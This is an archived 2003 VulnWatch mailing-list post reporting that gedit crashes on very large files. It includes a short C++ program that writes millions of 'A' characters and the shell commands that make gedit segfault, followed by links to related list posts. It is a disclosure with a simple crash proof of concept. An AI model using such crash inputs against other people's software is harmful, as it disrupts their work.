[VulnWatch] simple bufferoverflow in gedit

From: MegaHz (megahz_at_megahz.org)
Date: 11/23/03

  • Next message: Bojan Zdrnja: "[VulnWatch] Remote execution in My_eGallery" 
    To: vulnwatch@vulnwatch.org
Date: 23 Nov 2003 16:38:22 +0200

    Hello,
    I discover a strange but simple buffer overflow in gedit.
    I am using RH9,

    to demostrate the buffer here is a simple file buffer generator:

    ===========buffer.c == cut here===============
    /*
            simple buffer overflow generator by MegaHz megahz@megahz.org
    */
    #include <iostream>
    using namespace std;
     
    int main()
    {
    int i;
    for (i=0;i<=9999999;i++)
            {
            cout << "A";
            }
            return 0;
    }
    ===========================================

    # g++ -o buffer buffer.c
    # ./buffer > lala
    # gedit lala
    Segmentation fault
    #

    MegaHz (Andreas Constantinides)
    www.megahz.org
    www.cyhackportal.com

  • Next message: Bojan Zdrnja: "[VulnWatch] Remote execution in My_eGallery"

    Relevant Pages

    • simple buffer overflow in gedit
      ... I discover a strange but simple buffer overflow in gedit. ... int main ...
      (Bugtraq)
    • Re: simple buffer overflow in gedit
      ... > I discover a strange but simple buffer overflow in gedit. ... > to demostrate the buffer here is a simple file buffer generator: ... no signature is a good signature ...
      (Bugtraq)
    • [PATCH] Numerous fixes to kernel-doc info in source files.
      ... static inline int ffs ... @buffer: where the data must be copied. ... * struct kfifo with kfree. ... @timer: ...
      (Linux-Kernel)
    • [UNIX] Multiple Vulnerabilities in Citadel/UX
      ... could allow complete control over a vulnerable server. ... Citadel server as can be seen by this simplistic code snippet: ... configuration buffers, leading to the possibility of carrying out a buffer ... int connect_to_host; ...
      (Securiteam)
    • Re: pushing the envelope with sockets
      ... receiving on the socket they are received (upto the buffer size), you can even change what happens if the buffer runs full. ... int read = S.EndReceive; ... class AsyncReader: Reader ...
      (microsoft.public.dotnet.languages.csharp)